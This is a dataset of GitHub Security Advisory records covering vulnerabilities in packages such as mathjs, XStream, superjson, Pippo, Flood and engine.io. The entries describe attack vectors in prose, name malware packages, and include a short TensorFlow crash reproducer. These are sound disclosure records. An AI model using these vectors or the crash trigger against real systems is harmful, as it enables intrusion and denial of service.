GHSA | GHSA-hp5x-rqf7-43vf | Improper Handling of Exceptional Conditions and Improper Input Validation in Reactor Netty | Reactor Netty HttpServer, versions 0.9.3 and 0.9.4, is exposed to a URISyntaxException that causes the connection to be closed prematurely instead of producing a 400 response. | {'CVE-2020-5403'} | 2022-02-10T20:24:21Z | 2022-02-10T20:24:21Z | MODERATE | 7.5 | {'CWE-20', 'CWE-755'} | {'https://pivotal.io/security/cve-2020-5403', 'https://github.com/advisories/GHSA-hp5x-rqf7-43vf', 'https://nvd.nist.gov/vuln/detail/CVE-2020-5403'} | null |
GHSA | GHSA-vx5c-87qx-cv6c | Arbitrary Code Execution in mathjs | math.js before 3.17.0 had an arbitrary code execution in the JavaScript engine. Creating a typed function with JavaScript code in the name could result arbitrary execution.
## Recommendation
Update to version 3.17.0 or later. | {'CVE-2017-1001002'} | 2021-06-10T20:06:13Z | 2017-12-18T22:27:45Z | CRITICAL | 9.8 | {'CWE-94'} | {'https://www.npmjs.com/advisories/552', 'https://github.com/josdejong/mathjs/commit/8d2d48d81b3c233fb64eb2ec1d7a9e1cf6a55a90', 'https://github.com/advisories/GHSA-vx5c-87qx-cv6c', 'https://nvd.nist.gov/vuln/detail/CVE-2017-1001002', 'https://github.com/josdejong/mathjs/blob/master/HISTORY.md#2017-11-18-version-3170'} | null |
GHSA | GHSA-gvqv-779r-4jgp | Use after free in CefSharp | CVE-2020-16017: Use after free in site isolation
- https://chromereleases.googleblog.com/2020/11/stable-channel-update-for-desktop_11.html
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16017
Google is aware of reports that exploits for CVE-2020-16013 and CVE-2020-16017 exist in the wild.
There is currently little to no public information on the issue other than it has been flagged as `High` severity. | {'CVE-2020-16017'} | 2021-01-12T18:00:23Z | 2020-11-27T20:13:05Z | HIGH | 0 | {'CWE-416'} | {'https://github.com/advisories/GHSA-gvqv-779r-4jgp', 'https://github.com/cefsharp/CefSharp/security/advisories/GHSA-gvqv-779r-4jgp', 'https://crbug.com/1146709', 'https://nvd.nist.gov/vuln/detail/CVE-2020-16017', 'https://chromereleases.googleblog.com/2020/11/stable-channel-update-for-desktop_11.html'} | null |
GHSA | GHSA-xw5p-hw6r-2j98 | Denial of service in fastify | A denial of service vulnerability exists in Fastify v2.14.1 and v3.0.0-rc.4 that allows a malicious user to trigger resource exhaustion (when the allErrors option is used) with specially crafted schemas. | {'CVE-2020-8192'} | 2021-01-07T23:42:12Z | 2020-08-05T14:53:22Z | MODERATE | 0 | {'CWE-400'} | {'https://hackerone.com/reports/903521', 'https://github.com/fastify/fastify/commit/74c3157ca90c3ffed9e4434f63c2017471ec970e', 'https://nvd.nist.gov/vuln/detail/CVE-2020-8192', 'https://github.com/advisories/GHSA-xw5p-hw6r-2j98'} | null |
GHSA | GHSA-x3j8-g4v9-67jq | Downloads Resources over HTTP in pennyworth | Affected versions of `pennyworth` insecurely downloads resources over HTTP.
In scenarios where an attacker has a privileged network position, they can modify or read such resources at will. While the exact severity of impact for a vulnerability like this is highly variable and depends on the behavior of the package itself, it ranges from being able to read sensitive information all the way up to and including remote code execution.
## Recommendation
No patch is currently available for this vulnerability.
The best mitigation is currently to avoid using this package, using a different package if available.
Alternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees. | {'CVE-2016-10619'} | 2021-01-08T00:47:49Z | 2019-02-18T23:56:51Z | HIGH | 0 | {'CWE-311'} | {'https://github.com/advisories/GHSA-x3j8-g4v9-67jq', 'https://nvd.nist.gov/vuln/detail/CVE-2016-10619', 'https://nodesecurity.io/advisories/213', 'https://www.npmjs.com/advisories/213'} | null |
GHSA | GHSA-hrmm-f4j8-8vxc | Out-of-bounds write | A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-0912, CVE-2019-0913, CVE-2019-0914, CVE-2019-0915, CVE-2019-0916, CVE-2019-0917, CVE-2019-0923, CVE-2019-0924, CVE-2019-0925, CVE-2019-0927, CVE-2019-0933, CVE-2019-0937. | {'CVE-2019-0922'} | 2021-03-29T21:00:11Z | 2021-03-29T21:00:11Z | HIGH | 7.5 | {'CWE-787'} | {'https://github.com/chakra-core/ChakraCore/commit/d797e3f00e34c12c8c0ae52f56344325439dccd7', 'https://nvd.nist.gov/vuln/detail/CVE-2019-0922', 'https://github.com/chakra-core/ChakraCore/commit/a9ab1aae31078e80593b9227db11d316c2239ef3', 'https://github.com/advisories/GHSA-hrmm-f4j8-8vxc', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0922'} | null |
GHSA | GHSA-59jw-jqf4-3wq3 | XStream is vulnerable to an Arbitrary Code Execution attack | ### Impact
The vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types.
### Patches
If you rely on XStream's default blacklist of the [Security Framework](https://x-stream.github.io/security.html#framework), you will have to use at least version 1.4.16.
### Workarounds
See [workarounds](https://x-stream.github.io/security.html#workaround) for the different versions covering all CVEs.
### References
See full information about the nature of the vulnerability and the steps to reproduce it in XStream's documentation for [CVE-2021-21344](https://x-stream.github.io/CVE-2021-21344.html).
### Credits
钟潦贵 (Liaogui Zhong) found and reported the issue to XStream and provided the required information to reproduce it.
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [XStream](https://github.com/x-stream/xstream/issues)
* Contact us at [XStream Google Group](https://groups.google.com/group/xstream-user) | {'CVE-2021-21344'} | 2022-02-10T11:35:18Z | 2021-03-22T23:28:23Z | MODERATE | 5.3 | {'CWE-434', 'CWE-502'} | {'https://x-stream.github.io/security.html#workaround', 'https://lists.debian.org/debian-lts-announce/2021/04/msg00002.html', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PVPHZA7VW2RRSDCOIPP2W6O5ND254TU7/', 'https://lists.apache.org/thread.html/r9ac71b047767205aa22e3a08cb33f3e0586de6b2fac48b425c6e16b0@%3Cdev.jmeter.apache.org%3E', 'https://github.com/advisories/GHSA-59jw-jqf4-3wq3', 'https://github.com/x-stream/xstream/security/advisories/GHSA-59jw-jqf4-3wq3', 'https://www.oracle.com/security-alerts/cpuoct2021.html', 'https://lists.apache.org/thread.html/r8244fd0831db894d5e89911ded9c72196d395a90ae655414d23ed0dd@%3Cusers.activemq.apache.org%3E', 'https://www.debian.org/security/2021/dsa-5004', 'https://www.oracle.com/security-alerts/cpujan2022.html', 'https://x-stream.github.io/CVE-2021-21344.html', 'https://nvd.nist.gov/vuln/detail/CVE-2021-21344', 'http://x-stream.github.io/changes.html#1.4.16', 'https://security.netapp.com/advisory/ntap-20210430-0002/', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QGXIU3YDPG6OGTDHMBLAFN7BPBERXREB/', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/22KVR6B5IZP3BGQ3HPWIO2FWWCKT3DHP/', 'https://www.oracle.com//security-alerts/cpujul2021.html'} | null |
GHSA | GHSA-x3rm-644h-67m8 | Out-of-bounds Read in OpenCV | OpenCV 4.1.1 has an out-of-bounds read in hal_baseline::v_load in core/hal/intrin_sse.hpp when called from computeSSDMeanNorm in modules/video/src/dis_flow.cpp. | {'CVE-2019-16249'} | 2021-10-12T22:22:05Z | 2021-10-12T22:22:05Z | MODERATE | 5.3 | {'CWE-125'} | {'https://nvd.nist.gov/vuln/detail/CVE-2019-16249', 'https://github.com/opencv/opencv/pull/15531', 'https://bugzilla.redhat.com/show_bug.cgi?id=1752702', 'https://github.com/opencv/opencv/issues/15481', 'https://github.com/opencv/opencv-python/releases/tag/30', 'https://github.com/advisories/GHSA-x3rm-644h-67m8'} | null |
GHSA | GHSA-5888-ffcr-r425 | Prototype Pollution leading to Remote Code Execution in superjson | ### Impact
This is critical vulnerability, as it allows to run arbitrary code on any server using superjson input, including a Blitz.js server, without prior authentication or knowledge. Attackers gain full control over the server so they could steal and manipulate data or attack further systems. The only requirement is that the server implements at least one endpoint which uses superjson during request processing. In the case of Blitz.js, it would be at least one RPC call.
### Patches
This has been patched in superjson 1.8.1 and Blitz.js 0.45.3.
If you are unable to upgrade to Blitz.js 0.45.3 in a timely manner, you can instead upgrade only superjson to version 1.8.1 using yarn resolutions are similar. Blitz versions < 0.45.3 are only affected because they used superjson versions < 1.8.1.
### Workarounds
None
### For more information
If you have any questions or comments about this advisory:
* Open an issue in https://github.com/blitz-js/superjson
* Email us at b@bayer.ws
| {'CVE-2022-23631'} | 2022-04-19T19:03:22Z | 2022-02-09T22:20:49Z | CRITICAL | 9 | {'CWE-94', 'CWE-1321'} | {'https://github.com/advisories/GHSA-5888-ffcr-r425', 'https://github.com/blitz-js/superjson/security/advisories/GHSA-5888-ffcr-r425', 'https://nvd.nist.gov/vuln/detail/CVE-2022-23631'} | null |
GHSA | GHSA-v45m-2wcp-gg98 | Global node_modules Binary Overwrite in bin-links | Versions of `bin-links` prior to 1.1.6 are vulnerable to a Global node_modules Binary Overwrite. It fails to prevent globally-installed binaries to be overwritten by other package installs. For example, if a package was installed globally and created a `serve` binary, any subsequent installs of packages that also create a `serve` binary would overwrite the first binary. This behavior is still allowed in local installations.
## Recommendation
Upgrade to version 1.1.6 or later. | null | 2020-09-04T17:18:44Z | 2020-09-04T17:18:44Z | LOW | 0 | null | {'https://github.com/advisories/GHSA-v45m-2wcp-gg98', 'https://www.npmjs.com/advisories/1438'} | null |
GHSA | GHSA-m3fm-h5jp-q79p | Authorization bypass in Openshift | Openshift allows remote attackers to gain privileges by updating a build configuration that was created with an allowed type to a type that is not allowed. | {'CVE-2016-1906'} | 2021-12-20T16:58:14Z | 2021-12-20T16:58:14Z | CRITICAL | 9.8 | {'CWE-285'} | {'https://github.com/openshift/origin/commit/d95ec085f03ecf10e8c424a4f0340ddb38891406', 'https://access.redhat.com/errata/RHSA-2016:0070', 'https://github.com/openshift/origin/issues/6556', 'https://github.com/advisories/GHSA-m3fm-h5jp-q79p', 'https://access.redhat.com/errata/RHSA-2016:0351', 'https://github.com/openshift/origin/pull/6576', 'https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-1906', 'https://nvd.nist.gov/vuln/detail/CVE-2016-1906'} | null |
GHSA | GHSA-2cfc-865j-gm4w | XML External Entity Reference in detekt | Improper Restriction of XML External Entity Reference in GitHub repository detekt/detekt prior to 1.20.0. | {'CVE-2022-0272'} | 2022-04-26T13:03:17Z | 2022-04-22T00:00:36Z | HIGH | 7.3 | {'CWE-611'} | {'https://github.com/advisories/GHSA-2cfc-865j-gm4w', 'https://huntr.dev/bounties/23e37ba7-96d5-4037-a90a-8c8f4a70ce44', 'https://nvd.nist.gov/vuln/detail/CVE-2022-0272', 'https://github.com/detekt/detekt/commit/c965a8d2a6bbdb9bcfc6acfa7bbffd3da81f5395'} | null |
GHSA | GHSA-m539-j985-hcr8 | Crash in `max_pool3d` when size argument is 0 or negative | ### Impact
The Keras pooling layers can trigger a segfault if the size of the pool is 0 or if a dimension is negative:
```python
import tensorflow as tf
pool_size = [2, 2, 0]
layer = tf.keras.layers.MaxPooling3D(strides=1, pool_size=pool_size)
input_tensor = tf.random.uniform([3, 4, 10, 11, 12], dtype=tf.float32)
res = layer(input_tensor)
```
This is due to the TensorFlow's implementation of pooling operations where the values in the sliding window are not checked to be strictly positive.
### Patches
We have patched the issue in GitHub commit [12b1ff82b3f26ff8de17e58703231d5a02ef1b8b](https://github.com/tensorflow/tensorflow/commit/12b1ff82b3f26ff8de17e58703231d5a02ef1b8b) (merging [#51975](https://github.com/tensorflow/tensorflow/pull/51975)).
The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range.
### For more information
Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
### Attribution
This vulnerability has been reported externally via a [GitHub issue](https://github.com/tensorflow/tensorflow/issues/51936).
| {'CVE-2021-41196'} | 2021-11-10T19:36:21Z | 2021-11-10T19:36:21Z | MODERATE | 5.5 | {'CWE-191'} | {'https://github.com/tensorflow/tensorflow/commit/12b1ff82b3f26ff8de17e58703231d5a02ef1b8b', 'https://github.com/tensorflow/tensorflow/issues/51936', 'https://nvd.nist.gov/vuln/detail/CVE-2021-41196', 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-m539-j985-hcr8', 'https://github.com/advisories/GHSA-m539-j985-hcr8'} | null |
GHSA | GHSA-cg75-6938-wx58 | python-docutils allows insecure usage of temporary files | python-docutils allows insecure usage of temporary files | {'CVE-2009-5042'} | 2022-03-21T21:52:59Z | 2020-03-13T20:04:51Z | CRITICAL | 9.1 | {'CWE-668'} | {'https://security-tracker.debian.org/tracker/CVE-2009-5042', 'https://github.com/advisories/GHSA-cg75-6938-wx58', 'https://nvd.nist.gov/vuln/detail/CVE-2009-5042', 'https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=560755'} | null |
GHSA | GHSA-42xw-2xvc-qx8m | Denial of Service in axios | Versions of `axios` prior to 0.18.1 are vulnerable to Denial of Service. If a request exceeds the `maxContentLength` property, the package prints an error but does not stop the request. This may cause high CPU usage and lead to Denial of Service.
## Recommendation
Upgrade to 0.18.1 or later. | {'CVE-2019-10742'} | 2021-07-27T20:36:19Z | 2019-05-29T18:04:45Z | HIGH | 7.5 | {'CWE-20', 'CWE-755'} | {'https://github.com/axios/axios/issues/1098', 'https://github.com/advisories/GHSA-42xw-2xvc-qx8m', 'https://github.com/axios/axios/pull/1485', 'https://snyk.io/vuln/SNYK-JS-AXIOS-174505', 'https://www.npmjs.com/advisories/880', 'https://app.snyk.io/vuln/SNYK-JS-AXIOS-174505', 'https://nvd.nist.gov/vuln/detail/CVE-2019-10742'} | null |
GHSA | GHSA-7fm6-2qw4-g3x3 | High severity vulnerability that affects ro.pippo:pippo-core | An issue was discovered in Pippo 1.11.0. The function SerializationSessionDataTranscoder.decode() calls ObjectInputStream.readObject() to deserialize a SessionData object without checking the object types. An attacker can create a malicious object, base64 encode it, and place it in the PIPPO_SESSION field of a cookie. Sending this cookie may lead to remote code execution. | {'CVE-2018-18628'} | 2021-09-02T21:16:22Z | 2018-10-24T19:46:20Z | CRITICAL | 9.8 | {'CWE-502'} | {'https://github.com/advisories/GHSA-7fm6-2qw4-g3x3', 'https://github.com/pippo-java/pippo/issues/458', 'https://nvd.nist.gov/vuln/detail/CVE-2018-18628'} | null |
GHSA | GHSA-44vc-fpcg-5cc5 | Moderate severity vulnerability that affects safemode | Withdrawn, accidental duplicate publish.
The Safemode gem before 1.2.4 for Ruby, when initialized with a delegate object that is a Rails controller, allows context-dependent attackers to obtain sensitive information via the inspect method. | null | 2021-12-02T23:15:01Z | 2018-08-08T22:29:49Z | MODERATE | 0 | null | {'https://github.com/advisories/GHSA-44vc-fpcg-5cc5', 'https://nvd.nist.gov/vuln/detail/CVE-2016-3693'} | null |
GHSA | GHSA-7j93-5m2h-rvjx | Malicious Package in bconi | All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
## Recommendation
Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. | null | 2021-10-01T20:37:33Z | 2020-09-04T15:32:46Z | CRITICAL | 9.1 | {'CWE-506'} | {'https://www.npmjs.com/advisories/1353', 'https://github.com/advisories/GHSA-7j93-5m2h-rvjx'} | null |
GHSA | GHSA-rqjh-jp2r-59cj | nltk is vulnerable to Inefficient Regular Expression Complexity | nltk is vulnerable to Inefficient Regular Expression Complexity | {'CVE-2021-3842'} | 2022-01-06T22:24:14Z | 2022-01-06T22:24:14Z | HIGH | 7.5 | {'CWE-1333'} | {'https://github.com/nltk/nltk/commit/2a50a3edc9d35f57ae42a921c621edc160877f4d', 'https://huntr.dev/bounties/761a761e-2be2-430a-8d92-6f74ffe9866a', 'https://nvd.nist.gov/vuln/detail/CVE-2021-3842', 'https://github.com/advisories/GHSA-rqjh-jp2r-59cj'} | null |
GHSA | GHSA-r587-7jh2-4qr3 | Server secret was included in static assets and served to clients | ### Impact
Server JWT signing secret was included in static assets and served to clients.
This ALLOWS Flood's builtin authentication to be bypassed. Given Flood is granted access to rTorrent's SCGI interface (which is unprotected and ALLOWS arbitrary code execution) and usually wide-ranging privileges to files, along with Flood's lack of security controls against authenticated users, the severity of this vulnerability is **CRITICAL**.
### Background
Commit 8d11640b imported `config.js` to client (frontend) components to get `disableUsersAndAuth` configuration variable. Subsequently contents of `config.js` are compiled into static assets and served to users. Unfortunately `config.js` also includes `secret`.
Intruders can use `secret` to sign authentication tokens themselves to bypass builtin access control of Flood.
### Patches
Commit 042cb4ce removed imports of `config.js` from client (frontend) components. Additionally an eslint rule was added to prevent config.js from being imported to client (frontend) components.
Commit 103f53c8 provided a general mitigation to this kind of problem by searching static assets to ensure `secret` is not included before starting server (backend).
### Workarounds
Users shall upgrade if they use Flood's builtin authentication system.
While maintainers will do their best to support it, Flood cannot guarantee its in-house access control system can stand against determined attackers in high-stake environments.
> Use `HTTP Basic Auth` or other battle-hardened authentication methods instead of Flood's in-house one. You can use `disableUsersAndAuth` to avoid duplicate authentication.
Users are advised to check out the [wiki](https://github.com/jesec/flood/wiki) for more information on security precautions.
### References
[Wiki - Security precautions](https://github.com/jesec/flood/wiki/Security-precautions)
[Introduction to JSON Web Tokens](https://jwt.io/introduction/)
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [issue tracker](https://github.com/jesec/flood/issues)
* Email us at [jc@linux.com](mailto:jc@linux.com) | null | 2022-04-19T19:02:33Z | 2020-08-26T19:32:50Z | CRITICAL | 0 | null | {'https://github.com/jesec/flood/security/advisories/GHSA-r587-7jh2-4qr3', 'https://github.com/advisories/GHSA-r587-7jh2-4qr3', 'https://github.com/jesec/flood/commit/103f53c8d2963584e41bcf46ccc6fe0fabf179ca', 'https://github.com/jesec/flood/commit/d137107ac908526d43966607149fbaf00cfcedf0'} | null |
GHSA | GHSA-63qc-p2x4-9fgf | Improper Handling of Exceptional Conditions and Origin Validation Error in Eclipse Paho Java client library | In the Eclipse Paho Java client library version 1.2.0, when connecting to an MQTT server using TLS and setting a host name verifier, the result of that verification is not checked. This could allow one MQTT server to impersonate another and provide the client library with incorrect information. | {'CVE-2019-11777'} | 2021-04-27T19:46:41Z | 2019-09-17T22:47:11Z | MODERATE | 7.5 | {'CWE-346', 'CWE-755'} | {'https://github.com/advisories/GHSA-63qc-p2x4-9fgf', 'https://bugs.eclipse.org/bugs/show_bug.cgi?id=549934', 'https://nvd.nist.gov/vuln/detail/CVE-2019-11777'} | null |
GHSA | GHSA-2xjj-5x6h-8vmf | Moderate severity vulnerability that affects actionpack | Cross-site scripting (XSS) vulnerability in actionpack/lib/action_view/helpers/form_options_helper.rb in the select helper in Ruby on Rails 3.0.x before 3.0.12, 3.1.x before 3.1.4, and 3.2.x before 3.2.2 allows remote attackers to inject arbitrary web script or HTML via vectors involving certain generation of OPTION elements within SELECT elements. | {'CVE-2012-1099'} | 2021-08-31T20:19:51Z | 2017-10-24T18:33:38Z | MODERATE | 0 | {'CWE-79'} | {'https://github.com/advisories/GHSA-2xjj-5x6h-8vmf', 'http://www.openwall.com/lists/oss-security/2012/03/02/6', 'http://www.openwall.com/lists/oss-security/2012/03/03/1', 'http://groups.google.com/group/rubyonrails-security/msg/6fca4f5c47705488?dmode=source&output=gplain', 'https://bugzilla.redhat.com/show_bug.cgi?id=799276', 'https://nvd.nist.gov/vuln/detail/CVE-2012-1099', 'http://www.debian.org/security/2012/dsa-2466', 'http://lists.fedoraproject.org/pipermail/package-announce/2012-March/075740.html', 'http://lists.fedoraproject.org/pipermail/package-announce/2012-March/075675.html', 'http://weblog.rubyonrails.org/2012/3/1/ann-rails-3-0-12-has-been-released'} | null |
GHSA | GHSA-5qcg-w2cc-xffw | Uncontrolled resource consumption in validators Python package | The validators package 0.12.2 through 0.12.5 for Python enters an infinite loop when validators.domain is called with a crafted domain string. This is fixed in 0.12.6. | {'CVE-2019-19588'} | 2021-08-19T16:28:23Z | 2020-01-21T20:32:09Z | HIGH | 7.5 | {'CWE-835'} | {'https://github.com/advisories/GHSA-5qcg-w2cc-xffw', 'https://github.com/kvesteri/validators/issues/86', 'https://nvd.nist.gov/vuln/detail/CVE-2019-19588'} | null |
GHSA | GHSA-cwh5-3cw7-4286 | Moderate severity vulnerability that affects tlslite-ng | tlslite-ng version 0.7.3 and earlier, since commit d7b288316bca7bcdd082e6ccff5491e241305233 contains a CWE-354: Improper Validation of Integrity Check Value vulnerability in TLS implementation, tlslite/utils/constanttime.py: ct_check_cbc_mac_and_pad(); line "end_pos = data_len - 1 - mac.digest_size" that can result in an attacker manipulating the TLS ciphertext which will not be detected by receiving tlslite-ng. This attack appears to be exploitable via man in the middle on a network connection. This vulnerability appears to have been fixed after commit 3674815d1b0f7484454995e2737a352e0a6a93d8. | {'CVE-2018-1000159'} | 2021-09-09T21:22:07Z | 2018-07-12T20:30:44Z | MODERATE | 5.9 | {'CWE-354'} | {'https://github.com/advisories/GHSA-cwh5-3cw7-4286', 'https://nvd.nist.gov/vuln/detail/CVE-2018-1000159', 'https://github.com/tomato42/tlslite-ng/pull/234'} | null |
GHSA | GHSA-4r5x-qjqc-p579 | Tracking Module in botbait | The module `botbait` is a tool to be used to track bot and automated tools usage with-in the npm ecosystem.
`botbait` is known to record and track user information.
The module tracks the following information.
- Source IP
- process.versions
- process.platform
- How the module was invoked (test, require, pre-install)
## Recommendation
This package has no functional value, and should be removed from your environment if discovered. | {'CVE-2017-16126'} | 2021-09-23T21:47:46Z | 2020-09-01T18:57:44Z | MODERATE | 5.3 | {'CWE-200'} | {'https://www.npmjs.com/advisories/483', 'https://github.com/advisories/GHSA-4r5x-qjqc-p579', 'https://nodesecurity.io/advisories/483', 'https://nvd.nist.gov/vuln/detail/CVE-2017-16126'} | null |
GHSA | GHSA-9h9c-f287-c6vp | High severity vulnerability that affects org.apache.syncope:syncope-core | A malicious user with enough administration entitlements can inject html-like elements containing JavaScript statements into Connector names, Report names, AnyTypeClass keys and Policy descriptions. When another user with enough administration entitlements edits one of the Entities above via Admin Console, the injected JavaScript code is executed. | {'CVE-2018-17184'} | 2021-09-07T21:42:12Z | 2018-11-06T23:16:18Z | MODERATE | 5.4 | {'CWE-799'} | {'https://github.com/advisories/GHSA-9h9c-f287-c6vp', 'https://nvd.nist.gov/vuln/detail/CVE-2018-17184', 'https://syncope.apache.org/security#CVE-2018-17184:_Stored_XSS'} | null |
GHSA | GHSA-pchc-949f-53m5 | High severity vulnerability that affects multi_xml | multi_xml gem 0.5.2 for Ruby, as used in Grape before 0.2.6 and possibly other products, does not properly restrict casts of string values, which allows remote attackers to conduct object-injection attacks and execute arbitrary code, or cause a denial of service (memory and CPU consumption) involving nested XML entity references, by leveraging support for (1) YAML type conversion or (2) Symbol type conversion, a similar vulnerability to CVE-2013-0156. | {'CVE-2013-0175'} | 2021-09-16T16:30:50Z | 2017-10-24T18:33:37Z | HIGH | 0 | {'CWE-20'} | {'https://gist.github.com/nate/d7f6d9f4925f413621aa', 'https://github.com/sferik/multi_xml/pull/34', 'https://github.com/advisories/GHSA-pchc-949f-53m5', 'https://news.ycombinator.com/item?id=5040457', 'https://groups.google.com/forum/?fromgroups=#!topic/ruby-grape/fthDkMgIOa0', 'http://www.openwall.com/lists/oss-security/2013/01/11/9', 'https://nvd.nist.gov/vuln/detail/CVE-2013-0175'} | null |
GHSA | GHSA-5mwx-f6w6-7w5r | Cross-site Scripting in GeniXCMS | In Genixcms v1.1.11, a stored Cross-Site Scripting (XSS) vulnerability exists in /gxadmin/index.php?page=themes&view=options" via the intro_title and intro_image parameters. | {'CVE-2022-24563'} | 2022-03-11T23:26:55Z | 2022-03-04T00:00:19Z | MODERATE | 5.4 | {'CWE-79'} | {'https://github.com/truonghuuphuc/CVE', 'https://nvd.nist.gov/vuln/detail/CVE-2022-24563', 'https://github.com/advisories/GHSA-5mwx-f6w6-7w5r', 'https://github.com/truonghuuphuc/CVE/blob/main/CVE-2022-24563.pdf', 'https://genix.me/'} | null |
GHSA | GHSA-q75g-2496-mxpp | Regular Expression Denial of Service in parsejson | Affected versions of `parsejson` are vulnerable to a regular expression denial of service when parsing untrusted user input.
## Recommendation
The `parsejson` package has not been functionally updated since it was initially released.
Additionally, it provides functionality which is natively included in Node.js, and therefore the native `JSON.parse()` should be used, for both performance and security reasons. | {'CVE-2017-16113'} | 2021-01-08T18:16:16Z | 2018-07-24T20:11:13Z | HIGH | 0 | {'CWE-400'} | {'https://nodesecurity.io/advisories/528', 'https://github.com/get/parsejson/issues/4', 'https://nvd.nist.gov/vuln/detail/CVE-2017-16113', 'https://github.com/advisories/GHSA-q75g-2496-mxpp', 'https://www.npmjs.com/advisories/528'} | null |
GHSA | GHSA-652h-xwhf-q4h6 | OS Command Injection in ssh2 | ssh2 is client and server modules written in pure JavaScript for node.js. In ssh2 before version 1.4.0 there is a command injection vulnerability. The issue only exists on Windows. This issue may lead to remote code execution if a client of the library calls the vulnerable method with untrusted input. This is fixed in version 1.4.0. | {'CVE-2020-26301'} | 2021-09-21T16:50:46Z | 2021-09-21T16:50:46Z | HIGH | 7.5 | {'CWE-78'} | {'https://www.npmjs.com/package/ssh2', 'https://github.com/mscdex/ssh2/commit/f763271f41320e71d5cbee02ea5bc6a2ded3ca21', 'https://github.com/advisories/GHSA-652h-xwhf-q4h6', 'https://nvd.nist.gov/vuln/detail/CVE-2020-26301', 'https://securitylab.github.com/advisories/GHSL-2020-123-mscdex-ssh2/'} | null |
GHSA | GHSA-6jmm-mp6w-4rrg | OutOfMemory Exception by specifically crafted processing instruction in NekoHtml Parser | ### Impact
NekoHtml Parser suffers from a denial of service vulnerability on versions 2.60.0 and below. A specifically crafted input regarding the parsing of processing instructions leads to heap memory consumption. Please update to version 2.61.0.
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [https://github.com/HtmlUnit/htmlunit-neko](https://github.com/HtmlUnit/htmlunit-neko)
* Email us at [rbri at rbri.de]
| {'CVE-2022-29546'} | 2022-05-02T19:49:44Z | 2022-04-26T21:14:57Z | MODERATE | 0 | {'CWE-400'} | {'https://github.com/advisories/GHSA-6jmm-mp6w-4rrg', 'https://github.com/HtmlUnit/htmlunit-neko/security/advisories/GHSA-6jmm-mp6w-4rrg', 'https://nvd.nist.gov/vuln/detail/CVE-2022-29546', 'https://github.com/HtmlUnit/htmlunit-neko/commit/9d2aecd69223469e40c12ca3edddda09009110cc'} | null |
GHSA | GHSA-273r-mgr4-v34f | Uncaught Exception in engine.io | ### Impact
A specially crafted HTTP request can trigger an uncaught exception on the Engine.IO server, thus killing the Node.js process.
> RangeError: Invalid WebSocket frame: RSV2 and RSV3 must be clear
> at Receiver.getInfo (/.../node_modules/ws/lib/receiver.js:176:14)
> at Receiver.startLoop (/.../node_modules/ws/lib/receiver.js:136:22)
> at Receiver._write (/.../node_modules/ws/lib/receiver.js:83:10)
> at writeOrBuffer (internal/streams/writable.js:358:12)
This impacts all the users of the [`engine.io`](https://www.npmjs.com/package/engine.io) package starting from version `4.0.0`, including those who uses depending packages like [`socket.io`](https://www.npmjs.com/package/socket.io).
### Patches
A fix has been released for each major branch:
| Version range | Fixed version |
| --- | --- |
| `engine.io@4.x.x` | `4.1.2` |
| `engine.io@5.x.x` | `5.2.1` |
| `engine.io@6.x.x` | `6.1.1` |
Previous versions (`< 4.0.0`) are not impacted.
For `socket.io` users:
| Version range | `engine.io` version | Needs minor update? |
| --- | --- | --- |
| `socket.io@4.4.x` | `~6.1.0` | -
| `socket.io@4.3.x` | `~6.0.0` | Please upgrade to `socket.io@4.4.x`
| `socket.io@4.2.x` | `~5.2.0` | -
| `socket.io@4.1.x` | `~5.1.1` | Please upgrade to `socket.io@4.4.x`
| `socket.io@4.0.x` | `~5.0.0` | Please upgrade to `socket.io@4.4.x`
| `socket.io@3.1.x` | `~4.1.0` | -
| `socket.io@3.0.x` | `~4.0.0` | Please upgrade to `socket.io@3.1.x` or `socket.io@4.4.x` (see [here](https://socket.io/docs/v4/migrating-from-3-x-to-4-0/))
In most cases, running `npm audit fix` should be sufficient. You can also use `npm update engine.io --depth=9999`.
### Workarounds
There is no known workaround except upgrading to a safe version.
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [`engine.io`](https://github.com/socketio/engine.io)
Thanks to Marcus Wejderot from Mevisio for the responsible disclosure.
| {'CVE-2022-21676'} | 2022-04-19T19:03:20Z | 2022-01-13T16:14:17Z | HIGH | 7.5 | {'CWE-754'} | {'https://github.com/socketio/engine.io/commit/c0e194d44933bd83bf9a4b126fca68ba7bf5098c', 'https://github.com/socketio/engine.io/releases/tag/5.2.1', 'https://github.com/socketio/engine.io/releases/tag/6.1.1', 'https://github.com/advisories/GHSA-273r-mgr4-v34f', 'https://github.com/socketio/engine.io/commit/66f889fc1d966bf5bfa0de1939069153643874ab', 'https://github.com/socketio/engine.io/security/advisories/GHSA-273r-mgr4-v34f', 'https://github.com/socketio/engine.io/releases/tag/4.1.2', 'https://github.com/socketio/engine.io/commit/a70800d7e96da32f6e6622804ef659ebc58659db', 'https://nvd.nist.gov/vuln/detail/CVE-2022-21676'} | null |
